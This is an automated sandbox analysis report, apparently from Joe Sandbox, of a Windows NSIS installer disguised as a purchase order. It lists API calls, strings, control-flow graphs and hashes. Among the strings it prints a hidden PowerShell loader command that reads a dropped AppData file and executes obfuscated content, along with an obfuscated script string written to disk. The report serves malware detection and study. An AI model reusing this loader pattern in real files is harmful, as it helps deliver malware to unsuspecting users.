                                                        • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E39
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 00402C79
                                                        • Null, xrefs: 00402D72
                                                        • soft, xrefs: 00402D69
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                        • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                        • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                                        • Inst, xrefs: 00402D60
                                                        • Error launching installer, xrefs: 00402CC9
                                                        • C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                                        • Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe, xrefs: 00402CE6
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                        • API String ID: 2803837635-21818012
                                                        • Opcode ID: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                        • Instruction ID: f333638810b0fcdd6804239d6ce5d4266c39632cb53516581565939923b004a1
                                                        • Opcode Fuzzy Hash: 7d722e52d5d1ced09d0b69b569fd759111e039131ac18ea1231b4960ba6c6cec
                                                        • Instruction Fuzzy Hash: BA61E271A40205ABDB21AF64DE89F9A76B8EB00315F20413BF504F72C1D7BC9D409B9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,00000031), ref: 0040177E
                                                        • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)","powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)",C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,00000031), ref: 004017A8
                                                          • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Stedtillgs Setup,NSIS Error), ref: 00405CEB
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine$C:\Users\user\Music\magmaen.Pre
                                                        • API String ID: 1941528284-3985162459
                                                        • Opcode ID: 02128d24ded24020bf6e5f8c3e01999db9f63b98e863a3a1a5a250ba017e94e2
                                                        • Instruction ID: 7db23f1b7129aac0a780206d539a17182f36eced295e71d03ce013e672f77a8a
                                                        • Opcode Fuzzy Hash: 02128d24ded24020bf6e5f8c3e01999db9f63b98e863a3a1a5a250ba017e94e2
                                                        • Instruction Fuzzy Hash: 3241E471904615BADB10BBA9DD46EAF3679EF01328F30823BF111F20E1D67C8A419A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (function at 00404FC9; rendered graph with executed / not-executed block colouring not reproduced)
                                                        APIs
                                                        • lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                        • lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                        • lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                        • SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Completed
                                                        • API String ID: 2531174081-3087654605
                                                        • Opcode ID: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                        • Instruction ID: e00d580e889cbc391bca3c98a7377c16a9d81c786260b2fa8fb0dbec0f6b8e5c
                                                        • Opcode Fuzzy Hash: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                        • Instruction Fuzzy Hash: 9F218C71900508BADF119FA9CD84ADFBFA9FF04354F14807AF948A6290C3798E419FA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (function at 0040303A; rendered graph with executed / not-executed block colouring not reproduced)
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 0040304F
                                                          • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                        • WriteFile.KERNELBASE(Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT,0040E1FF,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                        • SetFilePointer.KERNELBASE(00063D29,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 00403094, 00403135
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$CountTickWrite
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 2146148272-112686333
                                                        • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                        • Instruction ID: d344cd596d8d4dd0b43dc6914abeb17836bbf3c0912801dceac3b69aa1d0b3ec
                                                        • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                        • Instruction Fuzzy Hash: 7841C3729042019FD710AF29EE849663FFCF74835A711813BE414B72E0D7399D529B9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 587 4015b3-4015c6 call 4029fd call 405807 592 4015c8-4015e3 call 405799 CreateDirectoryA 587->592 593 40160a-40160d 587->593 600 401600-401608 592->600 601 4015e5-4015f0 GetLastError 592->601 594 401638-402181 call 401423 593->594 595 40160f-40162a call 401423 call 405cde SetCurrentDirectoryA 593->595 608 402892-4028a1 594->608 595->608 611 401630-401633 595->611 600->592 600->593 604 4015f2-4015fb GetFileAttributesA 601->604 605 4015fd 601->605 604->600 604->605 605->600 611->608
                                                        APIs
                                                          • Part of subcall function 00405807: CharNextA.USER32(?,?,004210E8,?,00405873,004210E8,004210E8,?,?,76232EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405815
                                                          • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                          • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine,00000000,00000000,000000F0), ref: 00401622
                                                        Strings
                                                        • C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine, xrefs: 00401617
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                        • String ID: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine
                                                        • API String ID: 3751793516-3329137258
                                                        • Opcode ID: 6680b35b0edbfb8490efa218605708a5ac3e3ef274c755acae2fb438f6c2d17e
                                                        • Instruction ID: c68c5a489683e2fc4659e16c9c4aaa0bba9656052562f70290055e8dde3f70bb
                                                        • Opcode Fuzzy Hash: 6680b35b0edbfb8490efa218605708a5ac3e3ef274c755acae2fb438f6c2d17e
                                                        • Instruction Fuzzy Hash: E011E532908150ABDB117F755D4496F77B4EA62366728473FF891B22E2C23C4D42DA3E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 613 40599e-4059a8 614 4059a9-4059d4 GetTickCount GetTempFileNameA 613->614 615 4059e3-4059e5 614->615 616 4059d6-4059d8 614->616 618 4059dd-4059e0 615->618 616->614 617 4059da 616->617 617->618
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004059B2
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CC
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 0040599E
                                                        • nsa, xrefs: 004059A9
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A1, 004059A5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1636876243
                                                        • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                        • Instruction ID: 8c160f2977bc4404c48c8444970ea7289898f808bb444fb2a57fa0af4f665f22
                                                        • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                        • Instruction Fuzzy Hash: 4AF08976748304ABD7105F55DC04B9B7B98EF91760F148037F904DB180D5B49954C765
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 406109-40612c 620 406136-406139 619->620 621 40612e-406131 619->621 623 40613c-406145 620->623 622 406b56-406b5a 621->622 624 406b53 623->624 625 40614b 623->625 624->622 626 406152-406156 625->626 627 406292-406939 625->627 628 4061f7-4061fb 625->628 629 406267-40626b 625->629 635 40615c-406169 626->635 636 406b3e-406b51 626->636 639 406953-406969 627->639 640 40693b-406951 627->640 633 406201-40621a 628->633 634 406aa7-406ab1 628->634 630 406271-406285 629->630 631 406ab6-406ac0 629->631 638 406288-406290 630->638 631->636 641 40621d-406221 633->641 634->636 635->624 637 40616f-4061b5 635->637 636->622 642 4061b7-4061bb 637->642 643 4061dd-4061df 637->643 638->627 638->629 644 40696c-406973 639->644 640->644 641->628 645 406223-406229 641->645 646 4061c6-4061d4 GlobalAlloc 642->646 647 4061bd-4061c0 GlobalFree 642->647 648 4061e1-4061eb 643->648 649 4061ed-4061f5 643->649 650 406975-406979 644->650 651 40699a-4069a6 644->651 652 406253-406265 645->652 653 40622b-406232 645->653 646->624 654 4061da 646->654 647->646 648->648 648->649 649->641 655 406b28-406b32 650->655 656 40697f-406997 650->656 651->623 652->638 658 406234-406237 GlobalFree 653->658 659 40623d-40624d GlobalAlloc 653->659 654->643 655->636 656->651 658->659 659->624 659->652
                                                        Strings
                                                        • Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT, xrefs: 00406109
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Fysi`"Landl`$Stride subvnDis,ev adi: lgedL CaluODemonCCaukeAKrselLProvoA th,oP unluPSmitiD DyesA.emigTBroacASignz\Fl rbs Eks aTusinlNormapSandbeJoypot WhoreEpagorIambosGelaty,kserrTaccae TachfV ndkaPo tbbMaximr Mas,iBefstkAfnazkDentie StedrTrichsmetam\ SkanoT
                                                        • API String ID: 0-112686333
                                                        • Opcode ID: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                        • Instruction ID: 2ea2e7de70dfcb9b8a6977de9a23dc0afa47d6a26cb5075253e99f3f7356adb1
                                                        • Opcode Fuzzy Hash: 051121fa3874d8e8b755ab415ee1dff2938927d782d906638b2643d411ab8d22
                                                        • Instruction Fuzzy Hash: 16816771E04228DBDF24CFA8C8447ADBBB1FB44305F11816AD856BB281D778A996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 660 401bb8-401bd0 call 4029e0 * 2 665 401bd2-401bd9 call 4029fd 660->665 666 401bdc-401be0 660->666 665->666 668 401be2-401be9 call 4029fd 666->668 669 401bec-401bf2 666->669 668->669 672 401bf4-401c08 call 4029e0 * 2 669->672 673 401c38-401c5e call 4029fd * 2 FindWindowExA 669->673 683 401c28-401c36 SendMessageA 672->683 684 401c0a-401c26 SendMessageTimeoutA 672->684 685 401c64 673->685 683->685 686 401c67-401c6a 684->686 685->686 687 401c70 686->687 688 402892-4028a1 686->688 687->688
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                        • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                        • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                        • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 691 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 698 402892-4028a1 691->698 699 402368-402370 691->699 701 402380-402383 699->701 702 402372-40237f call 4029fd lstrlenA 699->702 705 402393-402396 701->705 706 402385-402392 call 4029e0 701->706 702->701 707 4023a7-4023bb RegSetValueExA 705->707 708 402398-4023a2 call 402f1f 705->708 706->705 712 4023c0-402496 RegCloseKey 707->712 713 4023bd 707->713 708->707 712->698 713->712
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                        • lstrlenA.KERNEL32(00409BB0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                        • RegCloseKey.KERNELBASE(?,?,?,00409BB0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID:
                                                        • API String ID: 1356686001-0
                                                        • Opcode ID: 42a98f93c9dfb85396e1c4e88c0bb033e1de74b0c76d2cf4d2a31f945ad1a69d
                                                        • Instruction ID: 9c4c752beb0f8e8bc138c26b394c9166cd94382eb1b14f60ad9d974daee8f686
                                                        • Opcode Fuzzy Hash: 42a98f93c9dfb85396e1c4e88c0bb033e1de74b0c76d2cf4d2a31f945ad1a69d
                                                        • Instruction Fuzzy Hash: C61172B1E00118BFEB10AFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D01AB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B6
                                                        • CloseHandle.KERNEL32(?), ref: 004054C3
                                                        Strings
                                                        • Error launching installer, xrefs: 004054A4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                        • Instruction ID: 3eb9eeac69da88a372b0c135ba7ac0e5d0d4abdecbe03941738571e2a7ac68f4
                                                        • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                        • Instruction Fuzzy Hash: 31E0E674A0020AABDB10EFA4DD4596F7BBDEB10305B408531B914E2160D774D810CA79
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                          • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                          • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
